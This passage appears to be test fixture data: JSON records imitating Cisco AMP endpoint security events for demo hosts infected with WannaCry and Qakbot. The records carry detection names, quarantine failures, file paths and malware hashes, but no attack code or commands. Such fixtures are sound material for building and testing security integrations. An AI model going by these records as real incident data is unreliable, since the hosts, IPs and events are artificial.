Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239050946806000,"timestamp":1610637528,"timestamp_nanoseconds":587000000,"date":"2021-01-14T15:18:48+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419239046651838535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239046651838000,"timestamp":1610637527,"timestamp_nanoseconds":932000000,"date":"2021-01-14T15:18:47+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419239046651838535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1492807649948000000,"timestamp":1610635719,"timestamp_nanoseconds":948000000,"date":"2021-01-14T14:48:39+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610635719,"start_date":"2021-01-14T14:48:39+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Unknown","file_name":"yuyfhonu.exe","file_path":"/C:/Users/johndoe/AppData/Roaming/Microsoft/Yuyfhonuu/yuyfhonu.exe","identity":{"sha256":"6b7d5fdf4b9d42a985cf861c5ef28f5fa914b418c22e4bf5b56bac12251bcd6c"},"parent":{"disposition":"Clean","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":773000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":664000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":570000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":430000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782275","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":368000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782274","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":134000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782273","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":102000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782272","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":102000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782271","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229335730782270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814972","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":773000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":648000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":570000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":414000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782275","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":368000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782274","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":134000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782273","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782272","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 